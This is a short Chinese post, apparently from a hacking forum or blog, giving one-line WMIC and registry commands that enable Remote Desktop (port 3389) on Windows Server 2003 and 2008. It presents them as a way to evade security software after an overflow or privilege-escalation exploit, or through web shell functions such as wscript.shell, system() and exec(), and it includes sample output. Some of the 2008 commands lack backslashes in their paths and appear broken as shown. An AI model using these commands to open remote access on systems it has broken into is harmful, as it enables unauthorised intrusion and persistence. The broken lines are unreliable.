网上流传了很多开3389的exe小工具,还有读写注册表的bat批处理,有的是操作注册表,有的是操作各种组件
这里提供一个不会被拦截,而且可以使用的开3389的cmd一句话

Win 2003:

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

不管你是溢出提权工具,还是 wscript.shell 或者是 system() , exec() 等等,都可以用这个来尝试开启3389
亲测比批处理好用多了

测试回显

正在安装 WMIC,请稍候。执行 (\\JOINR410-1\ROOT\CIMV2:Win32_TerminalServiceSetting.ServerName="JOINR410-1")->SetAllowTSConnections()
方法执行成功。
输出参数:
instance of __PARAMETERS
{
        ReturnValue = 0;

};

Win 2008

wmic /namespace:\rootcimv2terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
wmic /namespace:\rootcimv2terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1
reg add "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f